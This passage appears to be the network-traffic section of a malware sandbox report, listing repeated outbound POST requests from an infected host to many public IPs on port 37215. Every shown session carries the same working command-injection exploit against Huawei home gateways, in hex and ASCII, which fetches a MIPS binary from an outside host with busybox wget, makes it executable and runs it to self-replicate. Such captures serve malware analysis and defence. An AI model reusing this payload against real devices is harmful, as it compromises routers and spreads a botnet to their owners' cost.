2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          882192.168.2.1544522179.181.202.22637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.718998909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          883192.168.2.1535650197.114.220.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.719046116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          884192.168.2.1553478197.128.173.22637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.658720970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          885192.168.2.1553502157.250.230.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.658801079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          886192.168.2.1546532197.147.28.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.679639101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          887192.168.2.154788641.225.181.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.679706097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          888192.168.2.1534270197.15.224.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.679739952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          889192.168.2.1545194149.232.179.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.679788113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          890192.168.2.1538430172.98.166.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.679841042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          891192.168.2.154564098.21.104.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.679938078 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          892192.168.2.155416441.101.133.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.679996014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
